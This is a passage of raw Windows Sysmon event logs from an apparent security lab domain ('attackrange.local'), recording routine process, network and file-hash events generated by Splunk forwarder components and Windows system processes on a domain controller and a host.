08:04:50.746{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053475Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:50.746{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053474Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:50.746{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F7A2-60EB-D17D-00000000CF01}396C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053473Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:50.746{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F7A2-60EB-D17D-00000000CF01}396C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001053472Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:50.727{466BC892-F7A2-60EB-D17D-00000000CF01}396C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001053471Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:50.509{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E08A7B5ABD504C9B204037D372B3480D,SHA256=4E8525A5CD0957F38AB1D016CE73D7E2D8EC0B7E8F9FE425BCE6F04CD99A0C4A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809855Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:50.217{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=34776863094689F3202E57824F3E7E0E,SHA256=897A0584CAE33BF272A6E45134741E240ADEDCC421EF2FAAEB9315944CD66312,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001053470Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:50.393{466BC892-F7A2-60EB-D07D-00000000CF01}45644760C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x80000000000000001053469Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:42.655{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61926-false10.0.1.12-8000- 10341000x80000000000000001053468Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:50.193{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F7A2-60EB-D07D-00000000CF01}4564C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053467Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:50.193{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053466Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:50.193{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F7A2-60EB-D07D-00000000CF01}4564C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053465Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:50.193{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053464Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:50.193{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F7A2-60EB-D07D-00000000CF01}4564C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053463Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:50.193{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053462Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:50.193{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001053461Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:50.162{466BC892-F7A2-60EB-D07D-00000000CF01}4564C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001053491Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:51.546{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=57D6EC3358172ED6C8799D5977631010,SHA256=ED2213632EC83B16F2E805313EAA5FA4427FC961F4047A9893A8C944130DEB45,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809857Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:50.303{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57426-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000809856Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:51.232{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6214B57394EB0ED38898A923401FD09F,SHA256=0BE8C96740BFA25EFFBA913C8937B39FED17251D4F0B5D9AB00AC1F1B9E54355,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001053490Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:51.524{466BC892-F7A3-60EB-D27D-00000000CF01}56049792C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053489Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:51.346{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F7A3-60EB-D27D-00000000CF01}5604C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053488Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:51.346{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053487Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:51.346{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053486Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:51.346{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053485Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:51.346{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053484Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:51.346{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F7A3-60EB-D27D-00000000CF01}5604C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053483Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:51.346{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F7A3-60EB-D27D-00000000CF01}5604C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001053482Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:51.341{466BC892-F7A3-60EB-D27D-00000000CF01}5604C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001053481Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:51.208{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B0EB299F298E18754A759E27FD389680,SHA256=50B8CD5E02FE91688E366016E46C233485067D5EDFECF5E836F91C1EB74B1545,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053480Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:51.208{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D95779BEDF73FB21CEEC72DCB39FA773,SHA256=999EBA53109334C2C714FF065EBA50947F5F008F905397BDC9838BC3B0E01AF5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001053510Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:52.943{466BC892-F7A4-60EB-D47D-00000000CF01}88764728C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053509Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:52.723{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F7A4-60EB-D47D-00000000CF01}8876C:\Program 